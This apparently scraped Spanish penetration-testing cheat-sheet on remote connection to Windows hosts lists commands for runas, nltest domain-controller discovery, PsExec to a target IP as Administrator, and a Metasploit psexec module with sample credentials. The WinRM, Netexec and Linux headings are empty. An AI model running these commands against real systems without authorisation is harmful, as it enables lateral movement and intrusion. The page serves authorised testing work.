Conexión remota
Windows
Runas
runas /user:xtormincorp\usuario powershell.exenltest /dsgetdc:xtormincorp.localPSExec
psexec64.exe \\MACHINE_IP -u Administrator -p <password> -i cmd.exeuse exploit/windows/smb/psexec
set RHOSTS file:/home/kali/scope.txt
set smbuser xtormin
set smbpass password123
exploitpsexec -i -s powershell.exe # Ejecución de consola interactiva con el usuario actualWinRM
Netexec
Linux
Última actualización